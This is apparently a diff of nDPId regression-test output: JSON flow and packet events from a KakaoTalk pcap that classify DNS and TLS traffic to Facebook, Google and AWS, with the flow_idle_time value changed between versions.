+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2798,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069210863,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1430069210863,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069210863,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACih+UAAjgbKWq3CdeUKGFK8AbuV7IoFQj5TpMuVUBSklweYAAA="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2838,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069211505,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2838,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069211505,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAChd+0AA+AbBg638WIAKGFK8AbvqCPsyGz7Wm7gkUBQAALuKAAA="} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2839,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069211505,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADTK\/EAAjga+dq38WIAKGFK8AbvqCPsyGz7Wm7gkgBQClSKzAAABAQgKopRXsAACYuQ="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211639,"flow_last_seen":1430069211639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069211639,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069211639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069211639,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxoAkAAQAZvaQoYUryt\/FiA6jIBuzJ1sXgAAAAAoAI2sGN\/AAACBAV4BAIICgAC2XoAAAAAAQMDBQ=="} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069211640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":79,"pkt_l4_len":43,"thread_ts_msec":1430069211640,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD\/Ze0AAQBH4oQoYUrwKvAEBYocANQAr1lVimAEAAAEAAAAAAAAEbXF0dAhmYWNlYm9vawNjb20AAAEAAQ=="} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2856,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1430069211703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069211703,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy0dUAA+AZrBa38WIAKGFK8AbvqMmPPnoQydbF5YBIRHFG1AAACBAV4"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2857,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1430069211703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069211703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChoA0AAQAZvfAoYUryt\/FiA6jIBuzJ1sXljz56FUBA2sGNrAAA="} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2858,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069211639,"flow_last_seen":1430069211712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211712,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2856,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1430069211703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069211703,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy0dUAA+AZrBa38WIAKGFK8AbvqMmPPnoQydbF5YBIRHFG1AAACBAV4"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2857,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1430069211703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069211703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChoA0AAQAZvfAoYUryt\/FiA6jIBuzJ1sXljz56FUBA2sGNrAAA="} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2858,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069211639,"flow_last_seen":1430069211712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211712,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069211843,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":118,"pkt_l4_len":82,"thread_ts_msec":1430069211843,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGYfywAANRH9Kwq8AQEKGFK8ADVihwBSfKJimIGAAAEAAgAAAAAEbXF0dAhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAABNAACwRtcXR0A3Z2dsARwC8AAQABAAAAAQAErfxhAg=="} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211843,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.252.97.2"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2893,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069211639,"flow_last_seen":1430069212207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1430069212207,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"07dddc59e60135c7b479d39c3ae686af","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1430069211639,"flow_last_seen":1430069213599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2372,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2893,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069211639,"flow_last_seen":1430069212207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1430069212207,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"07dddc59e60135c7b479d39c3ae686af","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1430069211639,"flow_last_seen":1430069213599,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2372,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 